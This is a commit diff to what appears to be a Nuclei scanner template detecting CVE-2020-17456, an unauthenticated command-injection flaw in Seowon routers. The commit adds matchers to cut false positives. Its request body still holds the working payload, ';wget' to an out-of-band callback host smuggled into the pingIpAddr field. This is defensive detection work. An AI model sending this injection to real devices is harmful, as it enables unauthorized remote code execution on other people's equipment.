Fix CVE-2020-17456 (false positive) (#3997)

* Fix CVE-2020-17456 (false positive) * additional matchers Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-03-28 13:05:16 +02:00 · 2022-03-28 13:05:16 +02:00 · 91db326b54
parent 28afc48724
commit 91db326b54
1 changed files with 12 additions and 1 deletions
--- a/cves/2020/CVE-2020-17456.yaml
+++ b/cves/2020/CVE-2020-17456.yaml
@ -2,7 +2,7 @@ id: CVE-2020-17456

 info:
  name: Seowon SLC-130 And SLR-120S - Unauthenticated Remote Code Execution
-  author: gy741
+  author: gy741,edoardottt
  severity: critical
  description: SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.
  reference:
@ -31,9 +31,20 @@ requests:
        Content-Type: application/x-www-form-urlencoded

        Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
+
    cookie-reuse: true
+    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200